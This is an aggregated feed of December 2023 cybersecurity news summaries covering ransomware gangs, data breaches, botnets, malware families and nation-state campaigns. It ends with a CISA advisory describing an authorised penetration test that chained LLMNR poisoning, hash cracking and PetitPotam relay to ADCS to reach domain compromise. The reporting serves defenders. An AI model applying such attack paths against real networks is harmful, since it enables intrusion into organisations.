            2023-12-17 https://securityaffairs.com/155972/hacking/infectedslurs-botnet-qnap-viostor-nvr.html
            The Mirai-based botnet InfectedSlurs was spotted targeting QNAP VioStor NVR (Network Video Recorder) devices. In November, Akamai warned of a new Mirai-based DDoS botnet, named InfectedSlurs, actively exploiting two zero-day vulnerabilities to infect routers and video recorder (NVR) devices. The researchers discovered the botnet in October 2023, but they believe it has been active since […] "

            Autosummary: The experts reported that the InfectedSlurs botnet is exploiting a remote code execution (RCE) vulnerability, tracked as CVE-2023-47565 (CVSS score 8.0), in QNAP VioStor NVR (Network Video Recorder) devices. "


            MongoDB investigates a cyberattack, customer data exposed

            ciber
            2023-12-17 https://securityaffairs.com/156008/hacking/mongodb-investigate-cyberattack.html
            MongoDB on Saturday announced it is investigating a cyberattack that exposed customer account metadata and contact information. MongoDB on Saturday disclosed it is investigating a cyber attack against certain corporate systems. MongoDB is a US company that developed the popular open-source NoSQL database management system. The cyber attack was discovered on December 13, 2023, and […] "

            Autosummary: MongoDB investigates a cyberattack, customer data exposed (Pierluigi Paganini, December 17, 2023). MongoDB on Saturday announced it is investigating a cyberattack that exposed customer account metadata and contact information. "


            WordPress hosting service Kinsta targeted by Google phishing ads

            financial
            2023-12-17 https://www.bleepingcomputer.com/news/security/wordpress-hosting-service-kinsta-targeted-by-google-phishing-ads/
            WordPress hosting provider Kinsta is warning customers that Google ads have been observed promoting phishing sites to steal hosting credentials. [...] "

            Autosummary: Other Google ads promoted websites that pretended to be download sites for legitimate software, including Grammarly, MSI Afterburner, Slack, Dashlane, Malwarebytes, Audacity, μTorrent, OBS, Ring, AnyDesk, Libre Office, Teamviewer, Thunderbird, and Brave. "


            Rhadamanthys Stealer malware evolves with more powerful features

            exploits
            2023-12-17 https://www.bleepingcomputer.com/news/security/rhadamanthys-stealer-malware-evolves-with-more-powerful-features/
            The developers of the Rhadamanthys information-stealing malware have recently released two major versions to add improvements and enhancements across the board, including new stealing capabilities and enhanced evasion. [...] "

            Autosummary: The stealer is sold to cybercriminals via a subscription model, so it is distributed to targets using a variety of channels, including malvertizing, laced torrent downloads, emails, YouTube videos, and more. "


            Qbot malware returns in campaign targeting hospitality industry

            exploits industry
            2023-12-17 https://www.bleepingcomputer.com/news/security/qbot-malware-returns-in-campaign-targeting-hospitality-industry/
            The QakBot malware is once again being distributed in phishing campaigns after the botnet was disrupted by law enforcement over the summer. [...] "

            Autosummary: In the past, Qakbot has partnered with multiple ransomware operations, including Conti, ProLock, Egregor, REvil, RansomExx, MegaCortex, and, most recently, Black Basta and BlackCat/ALPHV. "


            New NKAbuse malware abuses NKN decentralized P2P network protocol

            exploits
            2023-12-16 https://securityaffairs.com/155935/malware/nkabuse-abuses-nkn-technology.html
            Experts uncovered a new Go-based multi-platform malware, tracked as NKAbuse, which is the first malware abusing NKN technology. Researchers from Kaspersky’s Global Emergency Response Team (GERT) and GReAT uncovered a new multiplatform malware dubbed NKAbuse. The malicious code is written in Go language, it is the first malware that relies on the NKN technology for data exchange […] "

            Autosummary: The malware supports multiple Distributed Denial of Service (DDoS) attacks, below is a list of the flooding payloads:
            Command    Attack
            Default/0  http_flood_HTTPGetFloodPayload
            1          http_flood_HTTPPostFloodPayload
            2          tcp_flood_TCPFloodPayload
            3          udp_flood_UDPFloodPayload
            4          ping_flood_PINGFloodPayload
            5          tcp_syn_flood_TCPSynFloodPayload
            6          ssl_flood_SSLFloodPayload
            7          http_slowloris_HTTPSlowlorisPayload
            8          http_slow_body_HTTPSlowBodyPayload
            9          http_slow_read_HTTPSlowReadPayload
            10         icmp_flood_ICMPFloodPayload
            11         dns_nxdomain_DNSNXDOMAINPayload
            NKAbuse also supports multiple backdoor features that turn it into a powerful remote access trojan (RAT). “Although relatively rare, new cross-platform flooders and backdoors like NKAbuse stand out through their utilization of less common communication protocols. "


            QNAP VioStor NVR vulnerability actively exploited by malware botnet

            exploits
            2023-12-16 https://www.bleepingcomputer.com/news/security/qnap-viostor-nvr-vulnerability-actively-exploited-by-malware-botnet/
            A Mirai-based botnet named "InfectedSlurs" is exploiting a remote code execution (RCE) vulnerability in QNAP VioStor NVR (Network Video Recorder) devices to hijack and make them part of its DDoS (distributed denial of service) swarm. [...] "

            Autosummary: "


            Hunters International ransomware gang claims to have hacked the Fred Hutch Cancer Center

            exploits ransomware
            2023-12-16 https://securityaffairs.com/155955/data-breach/hunters-international-hacked-fred-hutch.html
            The Hunters International ransomware gang claims to have hacked the Fred Hutchinson Cancer Center (Fred Hutch). Another healthcare organization suffered a ransomware attack, the Hunters International ransomware gang claims to have hacked the Fred Hutchinson Cancer Center (Fred Hutch). The ransomware gang has added the organization to its dark web leak site and is threatening […] "

            Autosummary: The threats were sent to a number of former and current Fred Hutch patients — as well as some who have received care from Hutch partner UW Medicine — and claimed the names, Social Security numbers, phone numbers, medical history, lab results and insurance history of more than 800,000 patients had been compromised.” reported the Seattle Times. Hunters International ransomware gang claims to have hacked the Fred Hutch Cancer Center (Pierluigi Paganini, December 16, 2023). The Hunters International ransomware gang claims to have hacked the Fred Hutchinson Cancer Center (Fred Hutch). "


            MongoDB says customer data was exposed in a cyberattack

            ciber
            2023-12-16 https://www.bleepingcomputer.com/news/security/mongodb-says-customer-data-was-exposed-in-a-cyberattack/
            MongoDB is warning that its corporate systems were breached and that customer data was exposed in a cyberattack that was detected by the company earlier this week. [...] "

            Autosummary: "


            Tren Maya: Mexico’s Yucatán railway project horrifies environmentalists

            latam
            2023-12-15 https://www.bbc.co.uk/news/world-latin-america-67638183?at_medium=RSS&at_campaign=KARANGA
            Mexico’s president says the Tren Maya will bring tourism and development to the jungle. But at what cost? "

            Autosummary: "


            Ukraine war: How TikTok fakes pushed Russian lies to millions

            rusia-ucrania
            2023-12-15 https://www.bbc.co.uk/news/world-europe-67687449?at_medium=RSS&at_campaign=KARANGA
            The BBC uncovers a vast Russia-based network of fake TikTok accounts pushing disinformation about Ukraine. "

            Autosummary: "


            Fortifying cyber defenses: A proactive approach to ransomware resilience

            exploits ransomware
            2023-12-15 https://www.helpnetsecurity.com/2023/12/15/government-cybersecurity-tools/

            Ransomware has become a pervasive threat, compromising the security and functionality of vital systems across the United States. While governmental pledges and public declarations of intent to fight cybercrime are foundational, they often lack the immediate and tangible impact necessary to counter sophisticated cyber threats. Case in point – the US recently pledged, along with 39 other countries, not to pay ransoms. In theory this makes sense: don’t pay, the bad guys don’t make money … More

            The post Fortifying cyber defenses: A proactive approach to ransomware resilience appeared first on Help Net Security.

            "

            Autosummary: This approach can also foster public-private partnerships, as government agencies can collaborate with cutting-edge technology firms to develop new standards, best practices, and adapt commercial tools for government use, ensuring the most robust protection possible. By purchasing and deploying advanced tools to stop ransomware in its tracks, the government can protect its assets and citizens, deter adversaries, stimulate the cybersecurity sector, and set a standard for private sector organizations to emulate. "


            New NKAbuse Malware Exploits NKN Blockchain Tech for DDoS Attacks

            exploits
            2023-12-15 https://thehackernews.com/2023/12/new-nkabuse-malware-exploits-nkn.html
            A novel multi-platform threat called NKAbuse has been discovered using a decentralized, peer-to-peer network connectivity protocol known as NKN (short for New Kind of Network) as a communications channel. "The malware utilizes NKN technology for data exchange between peers, functioning as a potent implant, and equipped with both flooder and backdoor capabilities," Russian "

            Autosummary: The server hosting the malware houses eight different versions of NKAbuse to support various CPU architectures: i386, arm64, arm, amd64, mips, mipsel, mips64, and mips64el. "


            BianLian, White Rabbit, and Mario Ransomware Gangs Spotted in a Joint Campaign

            exploits ransomware
            2023-12-15 https://securityaffairs.com/155893/cyber-crime/bianlian-white-rabbit-mario-ransomware-joint-campaign.html
            Resecurity has uncovered a meaningful link between three major ransomware groups, BianLian, White Rabbit, and Mario Ransomware. Based on a recent Digital Forensics & Incident Response (DFIR) engagement with a law enforcement agency (LEA) and one of the leading investment organizations in Singapore (and other victims), Resecurity (USA) has uncovered a meaningful link between three […] "

            Autosummary: BianLian, White Rabbit, and Mario Ransomware Gangs Spotted in a Joint Campaign (Pierluigi Paganini, December 15, 2023). Resecurity has uncovered a meaningful link between three major ransomware groups, BianLian, White Rabbit, and Mario Ransomware. "


            Idaho National Laboratory data breach impacted 45,047 individuals

            financial
            2023-12-15 https://securityaffairs.com/155880/data-breach/idaho-national-laboratory-data-breach.html
            The Idaho National Laboratory (INL) announced that it has suffered a data breach impacting more than 45,000 individuals. In November, the hacktivist group SiegedSec claimed responsibility for the hack of The Idaho National Laboratory (INL) and leaked stolen human resources data. SiegedSec is a threat actor that last year carried out multiple attacks against U.S. organizations, […] "

            Autosummary: “On November 20, 2023, INL was informed that a cyber data breach occurred on November 19, 2023, at an off-site data center that housed information on INL employees, former employees, spouses, and dependents. "


            Delta Dental says data breach exposed info of 7 million people

            financial
            2023-12-15 https://www.bleepingcomputer.com/news/security/delta-dental-says-data-breach-exposed-info-of-7-million-people/
            Delta Dental of California is warning almost seven million patients that they suffered a data breach after personal data was exposed in a MOVEit Transfer software breach. [...] "

            Autosummary: "


            Gang charged with running $80 million “pig butchering” cryptocurrency investment scam

            financial
            2023-12-15 https://www.bitdefender.com/blog/hotforsecurity/gang-charged-with-running-80-million-pig-butchering-cryptocurrency-investment-scam/
            US authorities have charged four people for their alleged roles in a fraudulent cryptocurrency investment scheme that saw targets approached via dating sites and social media, and cost victims more than $80 million. Read more in my article on the Hot for Security blog. "

            Autosummary: Lu Zhang, a 36-year-old woman from Alhambra, California; Justin Walker, 31, of Cypress, California; Joseph Wong, 32, of Rosemead, California; and 40-year-old Hailong Zhu, of Naperville, Illinois, have all been charged in relation to the alleged "pig butchering" scam that saw targets approached via dating sites and social media. "


            Bug or Feature? Hidden Web Application Vulnerabilities Uncovered

            exploits
            2023-12-15 https://thehackernews.com/2023/12/bug-or-feature-hidden-web-application.html
            Web Application Security consists of a myriad of security controls that ensure that a web application: Functions as expected. Cannot be exploited to operate out of bounds. Cannot initiate operations that it is not supposed to do. Web Applications have become ubiquitous after the expansion of Web 2.0, with Social Media Platforms, E-Commerce websites, and email clients saturating the internet "

            Autosummary: Common Attack Methods The three most common vulnerabilities that exist in this space are Injections (SQL, Remote Code), Cryptographic Failures (previously sensitive data exposure), and Broken Access Control (BAC). This critical vulnerability, from 2019, affected Apache HTTP servers running on Unix systems, especially those utilizing the mod_prefork, mod_worker, and mod_event libraries. Query Execution: The SQL query is executed with the user input as a parameter: As such, the query enters the backend as below: In this code, the (user_input,) is a tuple containing the user’s input. Injections SQL is the most common Database software that is used, and hosts a plethora of payment data, PII data, and internal business records. "


            Snatch ransomware gang claims the hack of the food giant Kraft Heinz

            exploits ransomware
            2023-12-15 https://securityaffairs.com/155918/cyber-crime/snatch-ransomware-kraft-heinz.html
            The Snatch ransomware group announced it had hacked the food giant Kraft Heinz, the company is investigating the claims. Kraft Heinz is an American food company, it is one of the largest food and beverage manufacturers globally. Kraft Heinz produces a wide range of popular food products, including condiments, sauces, cheese, snacks, and ready-to-eat meals. […] "

            Autosummary: Snatch ransomware gang claims the hack of the food giant Kraft Heinz (Pierluigi Paganini, December 15, 2023). The Snatch ransomware group announced it had hacked the food giant Kraft Heinz, the company is investigating the claims. "


            CISA urges tech manufacturers to stop using default passwords

            industry
            2023-12-15 https://www.bleepingcomputer.com/news/security/cisa-urges-tech-manufacturers-to-stop-using-default-passwords/
            Today, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) urged technology manufacturers to stop providing software and devices with default passwords. [...] "

            Autosummary: "This SbD Alert urges technology manufacturers to proactively eliminate the risk of default password exploitation," CISA said, by taking "ownership of customer security outcomes" and building "organizational structure and leadership to achieve these goals. "


            Ransomware gang behind threats to Fred Hutch cancer patients

            exploits
            2023-12-15 https://www.bleepingcomputer.com/news/security/ransomware-gang-behind-threats-to-fred-hutch-cancer-patients/
            The Hunters International ransomware gang claimed to be behind a cyberattack on the Fred Hutchinson Cancer Center (Fred Hutch) that resulted in patients receiving personalized extortion threats. [...] "

            Autosummary: As reported by the Seattle Times, the attackers emailed many patients stating they have the names, Social Security numbers, phone numbers, medical history, lab results, and insurance history of over 800,000 patients. "


            Delta Dental of California data breach exposed info of 7 million people

            financial
            2023-12-15 https://www.bleepingcomputer.com/news/security/delta-dental-of-california-data-breach-exposed-info-of-7-million-people/
            Delta Dental of California and its affiliates are warning almost seven million patients that they suffered a data breach after personal data was exposed in a MOVEit Transfer software breach. [...] "

            Autosummary: "


            The Week in Ransomware - December 15th 2023 - Ransomware Drama

            exploits ransomware
            2023-12-15 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-15th-2023-ransomware-drama/
            The big news over the past two weeks is the continued drama plaguing BlackCat/ALPHV after their infrastructure suddenly stopped working for almost five days. Multiple sources told BleepingComputer that this outage was related to a law enforcement operation, but BlackCat claims the outages were caused by a hardware/hosting issue. [...] "

            Autosummary: Contributors and those who provided new ransomware information and stories this week include: @malwrhunterteam, @demonslay335, @billtoulas, @fwosar, @Seifreed, @serghei, @BleepinComputer, @LawrenceAbrams, @Ionut_Ilascu, @ValeryMarchive, @BushidoToken, @azalsecurity, @SentinelOne, @g0njxa, @AlvieriD, @ShadowStackRE, @AShukuhi, @BrettCallow, @GossiTheDog, @vmiss33, @pcrisk, and @RESecurity. In other news, we learned about numerous ransomware attacks over the past two weeks, including: Finally, law enforcement has had some confirmed actions this week, including arresting a money launderer linked to Hive ransomware and a Russian pleading guilty to running a crypto exchange used by ransomware gangs. "


            The Afghan refugees stuck in limbo at the US-Mexico border

            latam
            2023-12-14 https://www.bbc.co.uk/news/world-latin-america-67661993?at_medium=RSS&at_campaign=KARANGA
            Refugees fleeing the Taliban face a treacherous journey through Latin America to the United States. "

            Autosummary: "


            Staying ahead in 2024 with top cybersecurity predictions

            ciber
            2023-12-14 https://www.helpnetsecurity.com/2023/12/14/2024-cybersecurity-landscape-video/

            What will 2024 hold for the cybersecurity landscape? In this Help Net Security video, Steve Cobb, CISO at SecurityScorecard, offers his take on what professionals can expect next year.

            The post Staying ahead in 2024 with top cybersecurity predictions appeared first on Help Net Security.

            "

            Autosummary: "


            Microsoft ICSpector: A leap forward in industrial PLC metadata analysis

            industry
            2023-12-14 https://www.helpnetsecurity.com/2023/12/14/microsoft-icspector-industrial-plc-metadata-analysis/

            Microsoft ICSpector is an open-source forensics framework that enables the analysis of industrial PLC metadata and project files.

            Architecture

            The framework provides investigators with a convenient way to scan for PLCs and identify any suspicious artifacts within ICS environments, which can be used for manual checking, automated monitoring tasks, or incident response operations to detect compromised devices. ICSpector allows investigators to review and customize the output to their requirements. It’s available on GitHub.

            The post Microsoft ICSpector: A leap forward in industrial PLC metadata analysis appeared first on Help Net Security.

            "

            Autosummary: "


            Attackers are trying to exploit Apache Struts vulnerability (CVE-2023-50164)

            exploits
            2023-12-14 https://www.helpnetsecurity.com/2023/12/14/poc-exploit-cve-2023-50164/

            Attackers are trying to leverage public proof-of-concept (PoC) exploit code for CVE-2023-50164, the recently patched path traversal vulnerability in Apache Struts 2. “Attackers aim to deploy webshells, with some cases targeting the parameter ‘fileFileName’ – a deviation from the original exploit PoC,” Akamai’s Security Intelligence Group flagged on Wednesday. The Shadowserver Foundation has also started noticing exploitation attempts in their sensors, though they don’t see them succeeding.

            About the vulnerability

            CVE-2023-50164, reported by Steven Seeley … More

            The post Attackers are trying to exploit Apache Struts vulnerability (CVE-2023-50164) appeared first on Help Net Security.

            "

            Autosummary: "


            French authorities arrested a Russian national for his role in the Hive ransomware operation

            exploits ransomware rusia-ucrania
            2023-12-14 https://securityaffairs.com/155815/cyber-crime/french-authorities-hive-ransomware-member.html
            French police arrested a Russian national who is suspected of laundering money resulting from the criminal activity of the Hive ransomware gang. The French authorities arrested in Paris a Russian national who is suspected of laundering criminal proceeds for the Hive ransomware gang. “A Russian, suspected of having recovered in cryptocurrencies the money taken from […] "

            Autosummary: The authorities reported that from June 2021 through at least November 2022, threat actors targeted a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH). "


            Russian hackers target unpatched JetBrains TeamCity servers

            government rusia-ucrania
            2023-12-14 https://www.helpnetsecurity.com/2023/12/14/russian-hackers-cve-2023-42793/

            Russian state-sponsored hackers have been exploiting CVE-2023-42793 to target unpatched, internet-facing JetBrains TeamCity servers since September 2023, US, UK and Polish cybersecurity and law enforcement authorities have warned.

            The targets

            APT 29 (aka CozyBear, aka Midnight Blizzard), believed to be associated with the Russian Foreign Intelligence Service (SVR), has been active since 2013. The group is known for targeting a wide variety of organizations: government agencies, think tanks, political organizations, diplomatic agencies, biomedical and energy … More

            The post Russian hackers target unpatched JetBrains TeamCity servers appeared first on Help Net Security.

            "

            Autosummary: These attacks seem to be opportunistic in nature and hit disparate organizations in the US, Europe, Asia, and Australia: “an energy trade association; companies that provide software for billing, medical devices, customer care, employee monitoring, financial management, marketing, sales, and video games; as well as hosting companies, tools manufacturers, and small and large IT companies.” "


            New Pierogi++ Malware by Gaza Cyber Gang Targeting Palestinian Entities

            exploits
            2023-12-14 https://thehackernews.com/2023/12/new-pierogi-malware-by-gaza-cyber-gang.html
            A pro-Hamas threat actor known as Gaza Cyber Gang is targeting Palestinian entities using an updated version of a backdoor dubbed Pierogi. The findings come from SentinelOne, which has given the malware the name Pierogi++ owing to the fact that it's implemented in the C++ programming language unlike its Delphi- and Pascal-based predecessor. "Recent Gaza Cybergang activities show "

            Autosummary: Some of the notable malware families in its arsenal include BarbWire, DropBook, LastConn, Molerat Loader, Micropsia, NimbleMamba, SharpStage, Spark, Pierogi, PoisonIvy, and XtremeRAT among others. "


            Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders

            exploits government
            2023-12-14 https://thehackernews.com/2023/12/iranian-state-sponsored-oilrig-group.html
            The Iranian state-sponsored threat actor known as OilRig deployed three different downloader malware throughout 2022 to maintain persistent access to victim organizations located in Israel. The three new downloaders have been named ODAgent, OilCheck, and OilBooster by Slovak cybersecurity company ESET. The attacks also involved the use of an updated version of a known OilRig downloader "

            Autosummary: OilRig, also known as APT34, Crambus, Cobalt Gypsy, Hazel Sandstorm (formerly EUROPIUM), and Helix Kitten, is an Iranian cyber espionage group that's known to be active since at least 2014, using a wide range of malware at its disposal to target entities in the Middle East. "


            Russian SVR-Linked APT29 Targets JetBrains TeamCity Servers in Ongoing Attacks

            government rusia-ucrania
            2023-12-14 https://thehackernews.com/2023/12/russian-svr-linked-apt29-targets.html
            Threat actors affiliated with the Russian Foreign Intelligence Service (SVR) have targeted unpatched JetBrains TeamCity servers in widespread attacks since September 2023. The activity has been tied to a nation-state group known as APT29, which is also tracked as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. It's notable for the supply chain "

            Autosummary: Targets of the campaign include an energy trade association; firms that provide software for billing, medical devices, customer care, employee monitoring, financial management, marketing, sales, and video games; as well as hosting companies, tools manufacturers, and small and large IT enterprises. "The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments," cybersecurity agencies from Poland, the U.K., and the U.S. said. "


            U.S. nuclear research lab data breach impacts 45,000 people

            financial
            2023-12-14 https://www.bleepingcomputer.com/news/security/us-nuclear-research-lab-data-breach-impacts-45-000-people/
            The Idaho National Laboratory (INL) confirmed that attackers stole the personal information of more than 45,000 individuals after breaching its cloud-based Oracle HCM HR management platform last month. [...] "

            Autosummary: SiegedSec claims the data they leaked online includes a wide range of sensitive information, including affected individuals' full names, dates of birth, email addresses, phone numbers, Social Security Numbers (SSN), physical addresses, and employment information. "


            Prison for man who wiped bank’s data after being fired for accessing porn in the office

            financial
            2023-12-14 https://www.bitdefender.com/blog/hotforsecurity/prison-for-man-who-wiped-banks-data-after-being-fired-for-accessing-porn-in-the-office/
            A man has been sentenced to 24 months in prison after being found guilty of hacking into his former employer's network, and causing substantial damage. Read more in my article on the Hot for Security blog. "

            Autosummary: According to a press release from the US Attorney's office, Brody deleted code repositories the bank stored in the cloud, ran a script to delete logs, left "taunts" for former colleagues within bank code, and impersonated other employees by opening sessions in their names. "


            Hackers exploit Google Forms to trick users into falling for call-back phishing attack

            financial exploits
            2023-12-14 https://www.tripwire.com/state-of-security/google-forms-used-call-back-phishing-scam
            Security researchers have discovered the latest evolution in call-back phishing campaigns. Read more in my article on the Tripwire State of Security blog. "

            Autosummary: So, the attacker receives the invitation to fill out the form - and when they complete it, they enter their intended victim's email address into the form, not their own. Call-back phishing dupes unsuspecting victims into telephoning a fraudulent call centre, where they will speak to an actual human being - who will then trick them into downloading and running malware, providing malicious hackers with remote access to their PC. "


            Bitdefender Scamio helps users verify fraudulent online schemes

            financial
            2023-12-14 https://www.helpnetsecurity.com/2023/12/14/bitdefender-scamio/

            Bitdefender unveiled Bitdefender Scamio, a complimentary scam detection service designed to help users verify fraudulent online schemes delivered by email, embedded links, text, and instant messaging through collaboration with a chatbot powered by AI. Online fraud continues to increase each year. According to a Federal Trade Commission (FTC) report, consumer losses to fraud in 2022 totaled $8.8 billion, a 30% increase from the previous year. Scams delivered via text messaging alone accounted for $330 million … More

            The post Bitdefender Scamio helps users verify fraudulent online schemes appeared first on Help Net Security.

            "

            Autosummary: “The rapid rise of AI adoption by cybercriminals to dupe people out of money, steal personal information, and infiltrate their digital lives has become a true game changer,” said Ciprian Istrate, SVP of operations, Consumer Solutions Group at Bitdefender. "


            116 Malware Packages Found on PyPI Repository Infecting Windows and Linux Systems

            exploits Linux
            2023-12-14 https://thehackernews.com/2023/12/116-malware-packages-found-on-pypi.html
            Cybersecurity researchers have identified a set of 116 malicious packages on the Python Package Index (PyPI) repository that are designed to infect Windows and Linux systems with a custom backdoor. "In some cases, the final payload is a variant of the infamous W4SP Stealer, or a simple clipboard monitor to steal cryptocurrency, or both," ESET researchers Marc-Etienne M.Léveillé and Rene "

            Autosummary: "In some cases, the final payload is a variant of the infamous W4SP Stealer, or a simple clipboard monitor to steal cryptocurrency, or both," ESET researchers Marc-Etienne M.Léveillé and Rene Holt said in a report published earlier this week. "


            Russia-linked APT29 spotted targeting JetBrains TeamCity servers

            government
            2023-12-14 https://securityaffairs.com/155846/apt/apt29-targeting-jetbrains-teamcity-servers.html
            Russia-linked cyber espionage group APT29 has been targeting JetBrains TeamCity servers since September 2023. Experts warn that the Russia-linked APT29 group has been observed targeting JetBrains TeamCity servers to gain initial access to the targets’ networks. The APT29 group (aka SVR group, Cozy Bear, Nobelium, BlueBravo, Midnight Blizzard, and The Dukes) exploited the flaw CVE-2023-42793 in TeamCity to carry out […] "

            Autosummary: “Identified victims included: an energy trade association; companies that provide software for billing, medical devices, customer care, employee monitoring, financial management, marketing, sales, and video games; as well as hosting companies, tools manufacturers, and small and large IT companies.” “The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments.” reads the joint Cybersecurity Advisory (CSA) titled Russian Foreign Intelligence Service (SVR) "


            New NKAbuse malware abuses NKN blockchain for stealthy comms

            exploits
            2023-12-14 https://www.bleepingcomputer.com/news/security/new-nkabuse-malware-abuses-nkn-blockchain-for-stealthy-comms/
            A new Go-based multi-platform malware identified as "NKAbuse" is the first malware abusing NKN (New Kind of Network) technology for data exchange, making it a stealthy threat. [...] "

            Autosummary: DDoS attack commands (Kaspersky) "All these payloads historically have been used by botnets, so, when combined with the NKN as the communication protocol, the malware can asynchronously wait for the master to launch a combined attack," Kaspersky says. "


            Ten new Android banking trojans targeted 985 bank apps in 2023

            financial exploits
            2023-12-14 https://www.bleepingcomputer.com/news/security/ten-new-android-banking-trojans-targeted-985-bank-apps-in-2023/
            This year has seen the emergence of ten new Android banking malware families, which collectively target 985 bank and fintech/trading apps from financial institutes across 61 countries. [...] "

            Autosummary: Regarding the most targeted countries, first on the list is the United States (109 targeted bank apps), followed by the United Kingdom (48 bank apps), Italy (44 apps), Australia (34), Turkey (32), France (30), Spain (29), Portugal (27), Germany (23), and Canada (17). Overview of the ten banking trojans that emerged in 2023 (Zimperium) Of the malware families that existed in 2022 and were updated for 2023, those that maintain notable activity are Teabot, Exobot, Mysterybot, Medusa, Cabossous, Anubis, and Coper. "


            Recently-patched Apache Struts vulnerability used in worldwide attacks

            exploits
            2023-12-14 https://www.malwarebytes.com/blog/news/2023/12/recently-patched-apache-struts-vulnerability-used-in-worldwide-attacks
            A recently patched Apache Struts 2 vulnerability has been spotted in worldwide exploitation attempts. Users and admins should update ASAP. "

            Autosummary: In this case, the attacker gets the ability to write a server-side rendered file, such as a JSP (Jakarta Server Pages) file, into a target directory. "


            ALPHV ransomware gang returns, sorta

            exploits ransomware
            2023-12-14 https://www.malwarebytes.com/blog/ransomware/2023/12/alphv-ransomware-gang-returns-sorta
            The ALPHV ransomware group appears to be going through some things. "

            Autosummary: In January, the agency took down one of ALPHV’s contemporaries, Hive, and revealed it had penetrated the group’s infrastructure six months prior: Since late July 2022, the FBI has penetrated Hive’s computer networks, captured its decryption keys, and offered them to victims worldwide, preventing victims from having to pay $130 million in ransom demanded. Many of the group’s negotiation links are reportedly not working either, meaning that victims looking to pay off the gang are stuck in limbo, and it’s likely that neither the ALPHV group, nor the affiliates who use its ransomware to carry out attacks, are being paid. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "


            Enhancing Cyber Resilience: Insights from the CISA Healthcare and Public Health Sector Risk and Vulnerability Assessment

            exploits
            2023-12-14 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-349a

            SUMMARY

            In January 2023, the Cybersecurity and Infrastructure Security Agency (CISA) conducted a Risk and Vulnerability Assessment (RVA) at the request of a Healthcare and Public Health (HPH) sector organization to identify vulnerabilities and areas for improvement. An RVA is a two-week penetration test of an entire organization, with one week spent on external testing and one week spent assessing the internal network. As part of the RVA, the CISA assessment team conducted web application, phishing, penetration, database, and wireless assessments. The assessed organization was a large organization deploying on-premises software.

            During the one-week external assessment, the assessment team did not identify any significant or exploitable conditions in externally available systems that may allow a malicious actor to easily obtain initial access to the organization’s network. Furthermore, the assessment team was unable to gain initial access to the assessed organization through phishing. However, during internal penetration testing, the team exploited misconfigurations, weak passwords, and other issues through multiple attack paths to compromise the organization’s domain.

            In coordination with the assessed organization, CISA is releasing this Cybersecurity Advisory (CSA) detailing the RVA team’s activities and key findings to provide network defenders and software manufacturers recommendations for improving their organizations’ and customers’ cyber posture, which reduces the impact of follow-on activity after initial access. CISA encourages the HPH sector and other critical infrastructure organizations deploying on-premises software, as well as software manufacturers, to apply the recommendations in the Mitigations section of this CSA to harden networks against malicious activity and to reduce the likelihood of domain compromise "

            Autosummary: Noted Strengths. The CISA team noted the following business, technical, and administrative components that enhanced the network security posture of the tested environment. The organization’s network was found to have several strong, security-oriented characteristics such as: effective antivirus software; endpoint detection and response capabilities; good policies and best practices for protecting users from malicious files, including not allowing users to mount ISO files; minimal external attack surface, limiting an adversary’s ability to leverage external vulnerabilities to gain initial access to the organization’s networks and systems; strong wireless protocols; and network segmentation.

            Introduction. CISA has authority to, upon request, provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to federal and non-federal entities with respect to cybersecurity risks. As part of the RVA, the CISA assessment team conducted web application, phishing, penetration, database, and wireless assessments. However, during internal penetration testing, the team exploited misconfigurations, weak passwords, and other issues through multiple attack paths to compromise the organization’s domain.

            Phase II: Internal Assessment. Database, Web Application, and Wireless Testing: The CISA assessment team did not identify any significant or exploitable conditions from database or wireless testing that may allow a malicious actor to easily compromise the confidentiality, integrity, and availability of the tested environment. The assessment team identified legacy name resolution protocols (e.g., NetBIOS, LLMNR, mDNS) enabled in the network, and abused LLMNR to capture NTLMv2 hashes, which they then cracked and used for domain access.

            Attack Path 1. The assessment team initiated LLMNR/NBT-NS/mDNS/DHCP poisoning [T1557.001] with Responder [2], which works in two steps: Responder listens to multicast name resolution queries (e.g., LLMNR UDP/5355, NBTNS UDP/137)

            If a malicious actor compromised ACCOUNT 1, they could use it to modify, power off [T1529], and/or delete critical virtual machines, including domain controllers and file servers. The CISA team assessed that with ACCOUNT 1, they could use it to modify, power off, and/or delete critical virtual machines, including domain controllers and file servers. The CISA team accessed a virtual machine interface enabling them to modify, power off, and/or delete critical virtual machines including domain controllers, file servers, and servers.

            To demonstrate how this misconfiguration could lead to privilege escalation, the assessment team, leveraging its status as a mere authenticated user, briefly changed the WebServer template properties to set Client Authentication to True so that a certificate could be obtained for server authentication, ensuring the property was set back to its original setting of False immediately thereafter. Figure 3: Misconfigured ADCS Enumerated via Certipy. The team used PetitPotam [8] with ACCOUNT 4 credentials to force the organization’s domain controller to authenticate to the CISA-operated machine and then used Certipy to relay the coerced authentication attempt to the ADCS web enrollment service to receive a valid certificate for ACCOUNT 5, the domain controller machine account. The CISA team validated the privileges of these accounts by checking for READ,WRITE access on a domain controller C$ share [T1039], demonstrating Domain Administrator access and therefore domain compromise.

            Mitigation Strategy #1 Asset Management and Security: CISA recommends that HPH sector organizations implement and maintain an asset management policy to reduce the risk of exposing vulnerabilities, devices, or services that could be exploited by threat actors to gain unauthorized access, steal sensitive data, or disrupt critical services. The focus areas for this mitigation strategy include asset management and asset security, addressing asset inventory, procurement, decommissioning, and network segmentation as they relate to hardware, software, and data assets. A further mitigation strategy has focus areas that include email security, phishing prevention, access management, password policies, data protection and loss prevention, and device logs and monitoring solutions.

